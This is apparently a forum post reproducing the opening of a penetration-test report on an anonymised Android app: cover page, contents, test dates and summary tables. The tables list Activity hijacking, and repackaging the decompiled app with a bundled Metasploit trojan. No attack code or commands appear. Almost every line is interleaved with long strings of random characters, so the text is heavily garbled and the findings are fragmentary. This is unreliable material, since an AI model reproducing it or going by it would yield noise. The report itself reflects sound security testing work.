找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4596|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
. S8 m" z1 ?! p 8 U p' i& I! s7 T- ?

% w9 a8 p' _/ M/ A2 b * S& M6 f( n0 n
- {$ J$ v, @7 E4 \6 d! y ( m+ F H. N& q. ]

$ S9 c/ I) u( I% Y6 k 6 O( J9 f- J2 [: Y5 l
/ f0 m+ x% z; T' p3 K" o$ p+ Q Q2 h6 p$ I5 ?: L9 w& T S

! \3 o+ ]3 b) ] e9 _% B/ D( J 4 R$ e5 N( [+ B, J 文档编号:                # {! x% B# |7 R$ t/ i ! A5 S+ t+ r! B# Z/ N

9 I; y, S0 p' w! i8 d' d9 J' H$ e) h 7 u) N: a9 J+ J2 E0 Z; O. V

( x, H% k( U' o% |# M' a + z' X2 l7 M5 I! f- G   " G! m& B1 U$ ~3 Q) L) Q0 R. D ; `+ _1 D+ s$ o# `" H4 u8 }8 a

5 r K; P1 M5 V0 W2 S# ^/ X# u 4 V. o2 C7 k' K% w L9 |+ X- T

8 p, t$ g: K( P! z% t3 q% T+ p, e' G7 z1 A+ z, j! Y' I5 m3 \5 y   3 z) d; t) r. L# r; w3 y * g. r+ D5 N% W! |" s7 @( N

' w$ `( e0 N- W % i) `: x7 b5 I; {6 N1 x2 K+ D

+ R+ X0 @& I' U0 Y) b6 O 1 u4 @2 T8 F& \' S: {: W; I   & z& r7 A5 i9 L {2 }0 T! E : H/ }( c6 g y; \1 d1 b- j, `

7 Z: _2 @9 S# F$ q) O; \ 2 X/ O4 u! I& @! d) x

. L( J- _; e, x1 s/ @$ ]/ D% l $ P! a# ]4 X9 @& f: G: `   : ~4 j& ? e( \- L, A% e, k+ Z/ [) i3 ]/ r( v; r6 O! C

' {) B* k6 s* d- O8 [ , f% D, {! v3 C, i) z

* L1 k4 U: k7 f. n% a0 n! D2 ?* `, ?3 D$ _) M- s   7 A: ?6 n. {# [ 2 r& u) J) {8 @

( J5 G3 u2 @0 y& X: ^* P# f" r7 f6 \6 T, G1 B

* d2 ]1 A0 _; h# i4 w/ b" ~8 L/ |& n( H' C$ |! Q 某某某APP渗透测试 x5 s# j# t+ z5 H R8 T : e: _# s$ n: P; O

1 t; x E4 C* i+ c& I" S& n( H2 \2 y

7 a/ S9 \8 H3 d- p u7 j# u0 Q % p; e1 W8 _7 z+ n   & h& Z$ M/ M) y; |' R, `- Z & I1 W' Y) b4 ]* x- y

% |9 b9 Z5 y- U/ z* ~. v: o* U k; T, q) q, {9 j2 h7 g

8 s: @3 q5 w- ^ ; S0 e0 U: N6 x, ~8 I5 I2 n% x   , f% E8 W y8 t. O2 ~& d% B5 T 6 f) f6 d6 {* A( m& _% i5 S

E% Z5 L4 [( Y; E1 ?4 C' U ' \7 g1 |% E o4 Z( B

2 R$ q. r0 _3 S7 m: v 0 D6 c* @3 x) z# _3 h1 ^   4 L! O8 v- {0 k; g: `. ]5 |* K( F 0 O) u6 D/ H- u) {( c7 j: c4 f8 C% y) o

; Q0 f2 P$ v9 B9 D7 U+ i$ h1 l L

4 S0 @+ Z3 x, I( @( D# K$ h0 J& v; Q 7 h& R. |4 `2 W/ j* U, A, V   4 m X- L) j: n- t; g $ [8 C7 a2 G1 b; S, [

9 Y( B, r5 o) h2 P" M l5 W$ p. \9 b5 R

$ E) p# D# D7 o l* u6 T1 V* c# u9 [+ j, d u 技 术 报 告 4 c& O$ q7 Q+ r- ^ 6 D) B' z ]% o' O {; x! C

% l) M7 X' L9 ?# r2 L0 w t/ H! P1 b

7 E: C8 q2 n2 P$ a' ]5 N2 S" X6 ~# S" k* f- D   # V- @) j& ]( W w2 w ) g5 y. _, a( N' k4 h

" }, j/ a; v8 a& E; k . y3 y2 \' f" Q$ q. A- L

6 a& S! h. O7 Q- p : a! O0 X2 l8 u3 [$ d+ p8 d: g   ' F6 Y6 Z: D4 F9 a2 u: q 4 o ~9 f* d0 Q, A. M

* Z7 Z" [* b+ B4 Z0 \5 n- R' r 8 x+ R2 I3 X- v6 q: y8 [

9 P' @( O( ?5 [0 d J $ ?/ [0 [# q; Z9 k4 M- v. B7 y   * D( i& P3 z! Q. c. H" C3 |- }: Q2 m. ~! ?2 I6 y7 y% x: O

5 b. a( c/ ^& S! D& D9 b F . b0 m0 s. g' R, D2 s' @2 E

5 |# q$ Y, h- X. k. Q3 j/ f# b( j l, T. ?7 x7 Q   7 M: s. E0 }3 E7 G- X) Q % t; A' P1 Q% P- s4 E

- I* W) P/ k3 L: D( P ' K) R! I2 L, s* E9 ~2 ?: x5 _

, _3 U5 N" [% @ # U* R- R8 ^' z( `" L8 X/ `   0 t& w8 t+ t7 | g a% s8 f) G" `7 s/ m, ^* G( w! e: ^$ w

7 z' N! N3 Q/ n9 g7 a 9 ~4 Z, _& v. ]; q2 d, p/ _

$ F( n5 Z, H) n " N: Z) m2 b, {; r( j, X   7 X' v6 U' s+ Y x1 w8 V& h ( u4 I" ^: Z# R% U5 \

5 M7 F7 Q2 ^6 d4 K) f$ q. d A; T0 \9 K

! X# I6 o3 l5 Z ( T% G! y+ D6 a+ S   * v, v6 h0 s. z( \! h) M- s5 c" G5 o+ R v. I/ V& h4 h2 J, v

4 h" t3 W6 s1 `2 \8 S7 t) q- ~! U: b: ~

9 [3 R* k/ U. I% b ) U; ]% ^1 A& }   % X9 y& @- ^. m& v }6 ^% F4 O, p+ N2 p

+ k+ Y! d. g4 l9 C, Z # _7 [4 Q2 M0 V! P

$ D! K9 f5 c3 _. r# l+ { 7 U8 ?2 V' ]$ ]! F0 J   ^' o; F( J" T$ L 2 V) s) K, }( n9 p4 _8 n% y# |

}8 D4 _$ C1 D+ ^: ] ( z/ E. ~$ W# M$ h% ]

. j8 X. z& |$ E3 T$ I7 I0 P* L4 j6 d |7 h   0 Y) k% V0 X- v Q. f5 `+ |4 O" B$ T

: g8 [0 l# D% E" |: E4 g" Q+ p2 L6 X9 t+ B( C+ I

; ?; w0 @" s* M, T" \! N% G1 _ 9 E$ E/ x+ l+ z/ `   3 k, \7 G, s K! O; A% d2 `& `; g + `% B+ @4 `. ^8 G. O4 {

4 H3 e- k9 _/ U' B) p9 E 2 T) z$ F- a) y7 v0 e

6 r: T) e( \$ v' \* Z4 {; f5 A$ F) M Z2 Y9 n4 j   $ j, X8 J$ N( @% [; @6 V1 _ & H( F& ?) D O8 S Z$ d: |

+ a1 k3 H+ d) ?" T & A0 ^3 o) `4 t

- `1 J% t" f- I0 e6 S1 {4 S , y5 n2 |% G+ F# y+ L$ Z8 V   & R+ ]% i0 s7 O) h4 R7 S6 X6 J6 x 6 ?; I2 G& }/ y

2 g3 D4 o" D4 Z4 Q, d+ O0 \ 6 k' C5 J* S( }9 r5 E

9 o- ^ o) ^$ z0 \" b9 r2 T # f5 B5 _# _) u* Y1 m( ]4 R   . o# |# Q% |! L9 a4 L( m5 {# P. _8 ^+ |9 n0 F1 ? t3 r

! D; s4 c, e! |: j3 V1 T 0 c* _2 z' D8 @% |

, U: @+ u) C3 H) f; }+ y 3 C, L7 u0 t; y( h9 [1 g   9 X, {4 p4 t) t" F" V5 E" }+ Y) G9 \7 m

+ o( k5 v2 p9 S" R3 O5 t2 S" K* T - q: ^3 h" [' G0 ^

8 y. |0 U" ^4 ]: H* G4 Y) B( j 3 d8 L7 a8 @8 s7 _6 Q: h+ b   4 f" g; T8 \8 N& Z 8 _4 [/ a, Y: X0 { ]8 G

, p0 h4 P* I2 J2 S2 E' z3 a * \& |5 Z# e' n& H9 U3 r

5 k6 {& j) `& p5 F2 y2 w9 Y y7 J* Y! [" R# k" C& A   8 e4 d) s4 K; \ % F& h1 n5 d9 _; [2 t3 W

4 [2 W6 o. l+ i / n& ~4 z& K( N1 c

1 p( t( ^8 b' H5 W ! N) y7 h4 o p. R4 c4 X; \) H4 r) `   ! l4 i* M; ?3 y, M - t9 a% k `& A; f( m R

T0 e5 [& a. e6 Y0 g& S: c0 Z ( ]6 w9 t: X8 Q; V6 s: G

2 B5 p; z' `1 |' H ( c1 e2 K+ @' j6 U 二〇二〇年 9 C2 i/ E- i% a s4 f. w0 U+ l" F ) j9 x0 T7 |2 {& v

& G" t5 q" i: d* w8 L0 M, Z5 ]4 ~6 ]1 O7 R* p$ c, q( ]! y
& ^. x6 y" k+ `2 A$ Z4 r0 \! i * ?) r8 t" ~- D8 S7 @: E; G
& l) n- t0 C) L. W $ ~) b' J9 {5 M! I. d: T" n! R6 n 8 o; {8 S2 M1 A$ @* z 2 P. G% y3 D# ^) `
% w/ D4 Z) o! @) Q& P 7 z) r7 x; K$ P
7 S3 l, S& m" V$ z8 y6 Q. |1 @+ i9 M" s, c. [# W E9 J, {9 I' a: z0 |
3 i9 ~, |& O+ a' x! B, U8 b% V7 F+ [) b$ F6 G7 ~2 D/ f/ y - f9 q4 }4 L( H1 N' K7 V7 X8 N4 h/ k: d l( O
2 d+ a, Z# F; t/ B ) R/ y# H [/ C8 k

' S8 W' P* r" J" q& G. E f4 R & J# w" M/ F, | 目 录 : Z) [" z, `% G! p' R , e& Q: p( {: }' K3 | G

9 m9 {5 B6 B; ?+ i5 _ 6 }, E2 X$ l* l ( q% P+ C- k$ v( m ) j6 ^6 B" r7 a3 d( ] F

: j# O9 m/ a! I, V2 J1 ?& F+ l ! \3 B7 f1 S9 R4 O% J- `, q* b; \   ) |, [% I* u8 a5 c. B5 L6 y : O% M0 E) `" Y. u3 ~+ j

! M/ s+ c$ A/ e8 l% I* R 8 ?' X* r5 _* X! s S7 o; T( B

$ k. g3 I5 M! p6 z) G9 z- H 4 `& M1 O1 Q* b 1 概述... 3 6 @3 Z+ Z( S$ b$ q7 C) g2 H; e# B7 \8 d$ p7 k: m( H- k9 _& m

* t7 i$ p4 a t % {- K+ a1 n! m7 @2 G* o$ G0 A/ ~( ]( J

# X* r5 N- w! \( J6 C* | $ o$ W3 ]5 s5 U: p 1.2测试时间... 3 4 M3 x O! t9 O' t% h4 f * I* p! U. b6 a& ^ P7 y

* c( M' m4 L0 x6 J4 z7 c+ S+ B+ R# t. o* m6 B& K8 }2 O

+ e" B, A, @2 S; a. ?8 Q( j & [ Y9 G2 ]9 } 1.3测试对象... 3 : w( ~# C, O/ X& f8 e8 M: J ( x- o& h: o" J2 m

# f) U. K. ~- q b 7 k3 ]) @. s G: \

`# u' \* h# f O" x# P5 ~ # s8 f1 n# |+ z4 I1 O 1.4测试结果... 3 + o5 q& S) Q) ~7 T! U S1 X" y & k: z, C- y- F1 u. u

5 z1 R; K1 h6 [) w4 u/ J4 ]+ f' M* C" ?7 F4 y% Y* }8 X3 D

7 M" Q/ N* g+ S% @" | ' J5 z# ]" U# t- W. W# B4 _# A 2 检测结果... 4 ! j/ z2 {8 v* a . \2 Y0 i1 z+ K6 s z

# a/ ?$ P! Q& r, U' N 0 B: {' Y. q* H$ s C, L+ t

0 N6 ` J+ F+ v0 O" ` $ s: B9 _/ P0 W% [# A 2.1 某某某... 4 0 T0 o7 m# ^3 L! [% { $ q |, A1 f# @( O

; C9 O. K% b( V% |* e 7 e9 ^5 k3 n+ u' i+ n K( U

' d# j# F2 E2 ^$ Q3 g : b* b2 R8 o) `& x2 Z 2.1.1检测目标... 4 4 u( ?& R Z1 n7 C) r + z2 S( S* y b+ J0 f3 W* h" d3 i/ E

6 d! Q5 g* j- }" u( y " w& G9 U# h! k6 L) q* T

* L* W- w" j2 d# c5 _& m& z1 @ 2 R* [0 v3 ^% {) P3 D; i 2.1.2检测结果... 4 7 J, M2 t2 V) @ $ B, Q Z3 T. i4 \

% g% g5 h0 h- q9 k k' S/ D# }" A7 q! p5 M7 |/ p2 n

( c0 ?) ^$ z. n# }: t . G s* k! ^5 q2 G9 F9 X% m 2.1.2.1. 4 $ N( v, o) [8 E0 e' ]: D2 O% L$ Q# @4 h

8 J# c) |3 F+ r, U' K' F$ G 3 L$ {: `; ?- \3 s4 g; L6 J. }

6 \1 g/ A2 U9 g% S% u. u4 w2 a0 i" c 2.1.2.2. 6 * ?8 \- M9 H5 C F8 l! ?' k 5 U7 L# u+ @: q! s( u% Q

! U$ H& T; z5 f2 `; s6 V Y% \! r; `$ f

4 a( t- F- I. F6 I1 o4 x, t $ ` I7 L' |7 f0 [2 i0 p / w6 D u1 x# M7 |# C 5 u+ Y# n1 Z1 ?3 D4 c0 y/ |

( h4 \5 H. r4 H3 \ / w3 g0 Y- K8 V' L; u: r" F 0 N* ~. C3 ]! p9 ~, p* J- L7 r % J! ^8 @! p0 h# i9 \
$ x4 i6 V# N2 z2 C. i) R$ N $ f* h9 G# j( O, ]
} @; `. P( E( k" n4 c0 k1 ] w . } ~& A6 q" E8 i2 `% N1 x* I( V: R 2 x$ K2 G9 M8 o( Z' j) K % B4 K5 J- z* V2 S- i! K

: q, _. z! r9 O3 |# _ + L+ f6 T2 U3 r3 \ P4 v* R7 ? 1 概述 * w( N" I: D8 c! ^1 q: h' z 0 c( J3 t/ k1 L0 z: N

: k Q! f# r6 [- G+ @ ) r. D9 A8 r* w& o( a( r7 x+ m

: C! l9 S y/ m3 P' \" q+ |/ O4 h, @, } 1.2测试时间 5 ^# c4 {" Y- J( r# ^. u) Y9 M; u

2 z$ A" _# H7 m0 e1 ~& r! @; p0 v8 m ( K& I8 z; S" b, H' t1 J: S( B ! [" m9 X! I9 g2 C: m2 L# g# Q8 d! P& n3 j/ `7 M* S# y7 A) }$ ^3 E; s& Y# T, O9 \7 J1 F0 j) H6 r# H4 ~" V+ e# X! ^2 A' U+ \, D) R. n; K8 ]( a+ o3 V. K# H5 q# {* Y# C5 @. c c, m0 ?6 j8 W4 m% @9 `$ P( z! f) H5 V6 \" l$ ~& I2 F# w) a, |" N" a" n% x+ u& j+ {' n4 n- E l/ Q1 e Y( D9 B6 g* y& d' S; r* |4 c& [7 L y2 f k2 ^; I9 k) r' w* ?" I" H0 I' L* N; c4 l$ i/ x& {4 g; j: c2 {0 y6 `* T6 K1 K E3 |" i4 }; ~+ { C$ g9 Q! E+ F' R+ x$ ~$ r& `3 Y& x7 X. u# E$ }& O7 r- G- x' Y, u" S: |) q" N) b7 F6 v2 S5 h l' `' ?* v" T# x7 W5 @3 c9 P0 ^: s I5 e- M* {6 T( Z2 y4 d7 k1 b2 o$ g% \2 l0 T) M# W% p- c6 u$ P' i C8 h% D5 a0 I0 N& s' Y; b# E3 P8 S& a4 A$ H: W) ]2 [* w
x0 `, d2 p* [) F" s" g% X( b/ ~% d7 d% D

, F L% V9 q9 J) K! Z, ^ * ]6 |0 G9 T @4 }) J 渗透测试时间 : t, s7 k, `+ `$ k$ U* B% w, M, w- L: o$ N3 V/ L0 a

; C1 l6 l! Q+ j1 G1 d1 N4 l4 T1 \) ^' V) X% Y, U$ e/ H( C
4 t; j% O5 Z7 C7 g! ~+ G, ? , [/ `2 c3 I/ i4 B: @

& g6 }+ g# i5 ]9 } : k: E" @; t( D7 G6 M 起始时间 " _) g9 e* W1 @9 R7 B% s + l" \: F: F2 r9 R4 `

8 K9 r2 F9 Y! R7 S/ r; ]8 u8 U/ I/ @6 i 		* P3 O% Z5 z2 f, f) A, _$ C5 f8 v" y0 q: |# ~0 J \* i

- Q: I# O8 z" d& V! W: N0 I. a 9 A3 X3 d' n" }3 ?4 J" D/ f6 ~ 202046 . s! C4 g0 i5 X9 _; D 5 a/ ^; H; T/ Z- O

. U0 L" W# U; F$ U% ^ 4 M( N4 I5 g: c
5 X( ^ _: P9 Q ) p9 m# g9 ? ~# W2 `

o% A7 ^( ], c - z$ Y# V3 K+ {! K# M' P% ~9 Z 结束时间 1 d) U. L; L" n1 u# ]+ B# [" |5 L- a2 X! J$ o0 K9 j) o/ k

1 A8 u; _+ s, k5 l0 e6 Y+ m$ O U) c& W: |/ R: z& m8 A* G* E 		2 {: x$ `9 O; w( ?; J; d1 r& P 5 s* C: @6 j/ z7 j

8 j K9 h$ E- o4 F$ N) H5 F6 e5 A2 B5 ]( U# o8 I+ N: E 202049 6 ]6 D& S! o! [; X& E3 l ; |7 S. ?, Y* `5 p

2 C) v4 r8 Y! U, s# j1 K . Q4 I) Y: X: A
( F, \" W. e9 x1 C/ m' G 2 p3 \! P1 _3 D- C3 I ~! @8 V

( @, ~) {: w8 i. |5 f. n$ Y% S 0 J4 b# c. [/ w0 p3 G6 B 1.3测试对象 3 ], k- `/ r8 x$ K9 P. M) z2 N# W/ z ! t: r6 z; @8 S5 |0 t9 s, ]8 ~8 R

H8 f* ^9 m! I; h Q& x3 T- ~. ^$ O6 W* b; J

& \( M3 ?* j8 ~8 n O: y) G. Q; B' ?8 r 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 9 t5 w4 Z" k, ^9 {8 N 2 F* ^8 U& ^" M" D1 [& M3 j$ r

k; Z! }: a9 p7 M" a 9 M* i* K+ b$ A6 l$ Z, N

: x7 M' b: i0 }+ Y% C) a& i' @0 z3 J 7 B) |; [2 o& h7 W% H, t/ | 1-1 检测对象 " U' T. P9 H- L8 { % U! k( `3 ^1 Y1 b

2 ?" J" n7 G- ]# E $ ^1 q: h9 _4 k0 Z: k 2 X3 G+ w$ x6 k$ z5 [2 i8 m0 m3 m/ a5 [9 p' H6 M% c. [( [ a) _) m7 q" A8 X3 G) F, h$ q6 b3 P' k& D; J7 r0 C2 N, Q: u2 ]; A) q* H6 u# x; a# n6 v# |( M7 C, C; G% O1 H3 ]; R3 @ }8 H+ o( @+ p+ \& C* x( W( C# f" \- }* v, A' \2 r/ q* k: _9 y/ v/ A2 {" v* E# _9 f) E- R; I8 I7 W8 ^; N) U* e' d7 P# U& x' U6 W) W0 I4 ^7 F4 @( }" T3 d5 M! O+ w9 k4 L9 ]) S- c. Y1 X4 f' }3 @) K6 C; F- _$ ]5 u }- c' F; x0 e) M/ x: O& C- T3 x9 S" v2 Q0 c. N5 l4 l7 m- I0 L2 t) I/ W# O) W4 g5 b5 h$ p! K) l0 c+ M, W5 m3 Q5 M6 ]# x) D5 K' c, m* v% B, P- t7 ~0 H" l! n1 S% ?. h- P( X- [: s) g0 @3 `1 G( B% j/ z$ g0 b5 h& v1 \1 e! C8 @7 ^! @/ x* V1 E3 V. [+ [: c; g" f, w9 i# s4 y- z! b' i# W$ V/ _0 q$ r' a7 \& V6 N2 Y3 y' Z5 j* s0 n4 l
' \* a. ~6 W" T7 m. h + @5 ?3 X& s! \

3 j) Y( d$ H4 F$ Z. N/ a' Y8 k * b6 X# O4 g4 R3 q 序号 6 X* l; f8 Z. H2 N. p) R5 _- T6 R7 g 1 M; {! h; R, b/ K5 r6 T( b

1 A9 K5 }2 @; H5 w6 p 5 C2 Z& @, Y7 r 		6 i$ S1 A$ e. V ' U5 A! a2 H$ @7 M6 O% F7 j/ L7 K! S

$ e$ S+ F4 ]; j- V ^/ ?/ U* P" O9 H 测试对象 5 ]* s w8 M4 v* N9 w$ E ' r* l. X; L C C. o0 u

/ y" Q v% n. q 8 z* |/ j/ t0 u7 J7 v 		: b" Z) ^- r9 U 8 x& _7 V. k, A5 O5 A( Z

7 Y& E; i3 }9 B( f# m) C8 u" F- B1 J/ {4 | 测试地址 3 n. {+ m+ A9 G # U) u) V% C( x

) s4 g8 m. I* f4 q 1 H+ W9 _/ m! }9 f1 X 		: z7 u8 L7 F" [5 G 1 K' _! l6 a4 i1 Z" @

! u; y. |; E9 k; K8 { x - U2 Q1 k7 M9 s 安全漏洞 % Q: U3 w, ^3 O7 A + J! V6 @0 N1 p/ t0 k7 @

5 |( C, {+ T3 E2 G& S 6 Y1 f+ A3 L' r: c3 K C
' Y* X4 f) I: G) S/ ?, \ / f! F- A9 ]0 y% a, i1 P7 i

1 h2 F/ N$ `% C% p, H( R$ R; O' L " {9 w5 s6 H) d' h 1 7 i K, q' n! f5 c* G$ \* b / v" F7 }& t% Y6 F

7 O$ g" j7 q- H* b* ]; y8 o, f5 z5 ~; h3 m/ M! B: O 		. O; _8 M# O$ g+ } ; d4 n) _5 j' \

$ C! \3 Z2 B8 W5 ^ l ' m. K0 @' E3 u' {( W0 C 某某某安卓APP 3 e2 p- t, Q7 {/ A' K; ~) n ' u) X1 n8 @3 S6 V

' l* ^! Z1 e m! e! v ; Y% t# _7 G8 ^2 U! ? 		! j- t5 c0 F9 [4 V) k( l" o) i' i, K) M# e" }

8 I& Y1 T6 {" ^" [0 m9 n $ Y0 H% ?! H( y% X5 N   - z- O8 a) l& V5 q6 \9 e. h, n% }7 h3 k! t9 _

* H- m3 f! n& m* g$ h# E 0 f' G* D9 Q% b4 l5 X8 z( |) |" E$ e 		9 b( U0 ^- t8 }8 n7 x% A j2 v2 s( D* E3 k' A/ m; M7 _

' X# q/ m' y/ M% F* D % t: g5 z/ n9 F1 h8 F 2 % P' m* c8 A4 t2 ~2 B9 _# R 7 [7 ~2 y' l7 w6 l) @

* q y$ D2 x& X$ d8 ?( x 3 U% v% u* g* S! l* d& h) Q
u5 a7 l1 p9 y" a! z4 N7 q8 y

0 r; m# X/ l6 T2 u! q+ J0 M ! d( m" a6 G! U* P3 G/ I1 P 1.4测试结果 , n \" A1 Z; o6 j ; ] S- o: T) f0 H g7 J' d

# U: S' I2 y: {" C 8 M0 [ j) y& t' N

6 X2 d6 [1 t( d, Y$ e3 t1 _$ e 9 r0 h" S0 Z& c k8 B0 Q 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 1 L [8 ?6 v+ R% n0 b2 ~ + p+ U4 Z& d& H5 R; L) F

6 |! l0 g/ k: N. s4 d; i# r # T8 g( C) h' z# A N

9 b6 O: F; F' ?0 B) [6 j7 d# H# T8 \ 1 U+ U1 f7 | V: V7 r( }1 h   ! f# r( s: {; V' r ( s5 \6 K- j! Y* R) Z

8 i# e- e' U: h 4 u7 A; [( ?( B5 R8 W( p4 b) i/ z
# b' |$ K) ?2 Q- A& l+ u" I6 i + j8 n4 ~, i% M* z4 C 3 U2 W& p4 g |. D) @$ m( g: R! V# K9 F( N, d- a/ G5 X2 {8 q3 M5 T* p: U$ Q# ?2 l# J5 _$ j4 X5 | O- \+ Q$ ^, i# J0 q% p( g; @, S8 A9 |0 F, p2 `. s- ^4 t% G- x, o5 M! {( ~5 H& j9 A7 B& _, s0 q" w& j f' E% @9 c( G1 \) ^8 u1 J5 { R9 e2 M* h8 L; E7 S* ?3 W3 x7 q3 M1 g4 c. b/ a+ O& T/ {& [- c- t/ u7 _7 e- G& u, C4 r- q, f4 y s+ z4 D& E3 A+ S0 \" V; l T/ L9 U6 l; N$ w+ A" W3 M! M# K. X* q+ H) G6 o9 o7 E4 ^9 @- L# v- {) ^1 z9 E& G2 h8 D: n0 ]; Z3 ~2 Z3 V9 _; P0 y4 @+ a) x( H K/ V( E9 v( T7 T1 r! D! s! O. P. I: |% X; W9 _6 Q# d- { E+ L5 G2 G6 X1 g, S$ x4 X# r! w) |6 h, R- M! T1 w+ e X0 ?# W. e5 c+ X0 S8 i$ r( z1 }0 |# X: R! X/ B t" g5 q4 p# u) ?# f( B0 U6 x5 U1 i3 m; S% y7 W6 z; ?! j( D8 }6 l, D. }/ u& S6 ?. E4 {+ p4 ]4 P7 p' z1 ]) f* M$ J7 B w; K$ Q: e: Q# d# M+ k0 Z* \( _1 Y. V- D) x) y0 `6 S, n+ v* X% m! V, M9 H0 S0 } g- |# H3 D7 @- l |& ~ x3 h& f- {5 m5 a: R& ]5 h: t* y Y" j3 z+ J* t2 t- u3 F# w8 V6 m8 Y. c1 o# M" C2 p1 a6 D" R& f' P7 B. f2 T% ~- I6 r' y. w, v* i' k; m4 O1 D. K% `4 v" j+ t) X. L; X- y. h: o' a* O5 m: o9 }! H; h# Q M" X' a) M7 |+ J+ M+ C/ t0 Y# \6 y2 W. ]8 t$ A# A9 X' m F) |* z$ L+ e0 K( _
3 z& r0 H+ P8 I7 ^; ` 5 r- _) T9 [6 z

) V9 m. s: y: M" M6 V% u) K J- H ) `8 [! s, F( c1 b! Q 序号 , s0 J, a! f+ ?1 J, `. e3 U6 d" P; w. {5 Q& D) ]5 _

, J. l" [6 b: l6 {+ [. N! `/ O6 ~4 O3 k2 m# X. f 		+ z! G+ p! f7 Z* C2 k$ W; z+ k' v6 F

! c8 q! B, Q9 k" u( ^ " l( Q k8 T0 O8 p# E5 Y6 t 系统名称 ' h6 ]% o2 z6 u3 `' S, G6 e( ]0 ?9 G x4 h7 p2 } t5 ^) l3 d5 n

% B/ Z/ \0 T9 [/ @5 \2 K& D% y 7 R4 s5 o+ T6 L* W6 F 		" `& u- {6 r4 O n$ Y# ?$ j 7 O; E( M" w+ ]7 R. J

2 m5 o) m8 q9 R* U2 P' Q2 F& }8 F8 R 漏洞名称 , a* S6 B4 `, O3 L& o. Y% U3 G; K - M4 e8 h [; Q" K

7 W% e o8 b {6 s# z0 Y$ B 4 t; U! H7 z' c# |! { 		9 g* w# a+ k. q) S Z ( O5 |" \7 @7 u/ T

8 x) M3 c- p ] / l3 q+ `, D# O% x3 ~# s 漏洞危害 ( f) P0 ]* E0 Y& l2 h# a2 o; X+ b* H0 Y x5 J0 K5 w

3 I9 f! |* W7 v! r 3 K3 o* v& L" N8 ?5 _# r& v 		6 {6 ^( }+ w6 a; m ) y; W: P) h+ ?# q5 h$ v/ e: x, C

, [4 N% v& f" ?2 d+ |9 q" K6 G! p % _$ t5 e5 u) @8 T; i( W: _ 修复结果 ) T$ g! L8 v: Q1 e ( r3 {& Q7 ?6 t9 w

6 {; y, R6 O3 N( P9 Z9 s 7 a+ k' C ]8 x6 z% X2 U
$ [2 I9 a& a6 a 5 e C2 U) L- g, S6 ^4 [ B

( z9 p" n6 A9 c( v7 E' N3 @) L 9 E( V4 I. l# }: q3 y 1 $ a3 Z+ @+ H+ X 5 ^* |- d D* H, F9 ]! ~) T7 D

% b$ r- j. e/ M9 a$ k2 j9 ?/ y" j % M9 e; {# m% e3 e+ L 		; C6 K6 ^7 Z) _! o6 J1 _8 s ! A" P5 D- b4 Y7 k; W: Z

2 s* n. \& t' @9 D1 a" D8 T1 A- p! m% u/ B% n 某某某某某某APP % d7 {. ^( q: @: p, `/ c & V, i( ^7 K: m k) h

K% j9 K. m; A9 K ) z) x4 m. ]7 u. K9 l 		/ ^/ |, D8 B6 ^' n) N3 W2 N ; N+ m) V' W- D( \& l

5 A7 Q1 b5 v' m. _( h3 e, \ ) W7 |( Y5 R s# c2 W2 J: y Activity 劫持 1 |- l' }* u! R- h o6 X s) Q : t. ?" D+ S. v" ^& j

* i; D0 B$ ^5 r: S' J0 P : X) W x2 I4 B$ E X$ M! s: H q

4 D- B- w' G# X* u6 l+ @, g0 W , T' L. E+ z0 ^9 V) t4 o9 [ ?   / Z: z- g4 Z9 S7 b$ C 8 b* Y) T. ?3 [7 N5 P

1 o, C( \- t$ R1 J , K5 G9 ?6 b4 E) @8 | 		* S6 j; b8 u. U3 z 3 d2 L$ X; K$ J% m

; d# \7 U! V3 j4 G2 u5 q 8 _) s* j' h6 B% W3 l* p/ h& o ) b2 z' m2 N7 O; Z7 v" U6 S# ` R% n7 w" u

* z7 g) r& [/ B: A Y5 p 5 c T/ K+ f B 		# x3 ]+ f! P; R( q/ z" G9 ]* b # G* z( ?: ~' } T; k

. H o' Q. F' w1 Q & ?" O. I0 ]3 _   , M# G* y2 ~# @$ M2 O$ p2 [5 q& T - K4 u/ {9 A- c9 G- I# Q- B

8 x) }7 B; c* \1 a. {0 W8 y 4 a, B1 R: L" N5 ]! Y/ w- P
- o% r8 |$ A, k" A. t * M7 P. h$ `% U9 L% X6 o q

: v1 q8 f0 Q( ~3 A . w/ I1 Z1 ^: C* b$ h 2 2 P4 s8 O; L3 S3 E1 d6 m7 F ; X. i" t7 g, o* R+ j( V

- r O# A$ i; Y1 v3 R& R $ l/ f8 n- g& B9 q 		% r/ ^: h" H: i/ Z0 c' z. V( A- Y ( g0 s3 O9 V% s: z

- e" k/ N5 ]! O! e ( ~' N" b* r7 y: i k4 f 某某某某某某APP . k2 g7 K- h. G& Z6 _ " Q6 K# ?& g$ d

3 z2 L: s, H8 N3 ]& I / k! A1 W [: v" z 		* H4 D8 L1 G/ M7 Y* W- F) C8 n 1 h% V0 _7 Y) L0 a/ i

2 X B* q+ n7 z2 V6 ^: B2 g9 { : ^+ Q. E2 t% s3 f& @# Q: K9 r 反编译二次打包捆绑木马、篡改APP代码 0 [( R7 n( q* E $ C9 G& L2 e% x5 @7 i

! W" G% }8 H; c0 y % h N: B+ u. A7 x u- x7 b 		, o- Z8 b4 x2 i- I. s0 p+ w : d$ Z3 {# ?4 p

) d; j* k6 t2 b* }3 g9 l * p& r9 j6 V4 s$ q* \ ! |; H/ N: t: R4 q# L- c% m$ V) _2 w4 k

1 l3 Z& }( d' `9 Z! a) N1 d $ w8 {! |' a+ O" e* h 		- f2 Z* q8 w& L$ I - ]9 ^3 E2 g3 U: [, r

% i- R0 F' f; g+ w' t2 R5 I! P7 Q0 a4 F' ^4 R   7 [6 e: G( m) g( H' p; ]. ?4 g1 Y' H7 L' C: |9 o9 |; M$ I

, {0 D8 G+ x$ a- M; I : D4 ]5 _$ ^# Q4 g
+ w2 D$ W! P) l( y( z# B+ }+ R8 u, v6 `* H2 ~
4 ~& g6 }4 |9 k5 S7 k2 w 0 n; L/ j/ o/ O8 y; J

